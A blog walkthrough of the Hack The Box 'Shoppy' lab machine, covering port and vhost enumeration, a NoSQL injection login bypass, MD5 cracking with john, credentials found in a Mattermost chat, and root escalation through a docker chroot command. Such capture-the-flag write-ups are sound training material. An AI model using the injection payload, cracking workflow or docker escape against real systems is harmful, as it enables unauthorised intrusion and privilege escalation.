banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

htb靶場-ショッピ

image

ip:10.10.11.180

信息收集#

端口开放情况#

利用nmap进行端口扫描

nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.180

发现的端口:22,80,9093

image

80 跳转到http://shoppy.htb

修改 hosts 文件,添加解析

image

访问http://shoppy.htb/,首页如下:

image

域名情况#

既然有域名,就看看虚拟主机扫描能扫出什么东西。

gobuster vhost -u shoppy.htb -w /Users/grayash/pentesting/web-basic/p12-字典收集/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 50

image

找到一个虚拟主机子域

mattermost.shoppy.htb

mattermost.shoppy.htb添加到 hosts 文件中解析。

浏览器访问后,界面如下:

image

利用ffuf对 shoppy.htb 进行敏感目录及文件遍历。

.\ffuf.exe -w .\fuzz1.txt -u http://shoppy.htb/FUZZ

image

简单测试了下,这个登录框无 POST 链接。

当输入 admin' or '1'='1 程序会无响应,输入 admin' || '1=1 可以绕过后台登录,这个语句是 Nosql 的语句,所以这是一个 [[Nosql 注入]] 登录绕过。

image

在搜索框中输入同样的 payload:admin' || '1=1

image

查看 json 文件,内容如下,包括了账号密码,密码是 md5 加密了。

image

利用 [[john]] 破解 hash

john --wordlist=rockyou.txt --format=Raw-MD5  passwd.txt

image

remembermethisway

利用爆破出的密码登录 mattermost.shoppy.htb

账号密码为:

josh:remembermethisway

mattermost.shoppy.htb 网站是一个聊天程序,后台建立了很多个频道,在一个频道中找到了账号密码,通过分析应该是 10.10.11.180 服务器的密码,尝试 ssh 登录。

image

username: jaeger 
password: Sh0ppyBest@pp!

image

找到第一个 flag,user.txt。

通过 sudo -l 可以查看当前用户可以以 root 身份运行的程序。

image

/home/deploy/password-manager

image

Welcome to Josh password manager!Please enter your master password: SampleAccess granted! Here is creds !cat /home/deploy/creds.txtAccess denied! This incident will be reported !

SampleAccess granted! 所以 Sample 是主密码,通过这个程序就可以看到主密码。

就找到了 deploy 的密码。

image

username: deploy
password: Deploying@pp!

同样的方式,ssh 登录 deploy 账号。

image

权限提升#

通过频道的聊天记录可以知道,服务器是 docker 部署的。

image

通过https://gtfobins.github.io/gtfobins/docker/ 网站找到 docker 权限提升的 payload,通过 docker 可以获取一个交互式 shell。

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

运行后就是 root 权限。

image

获取 /root 目录下的 flag。

知识点#

  • 信息收集能力
  • 虚拟主机、md5 密码破解的能力
  • 权限提升能力

参考#

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。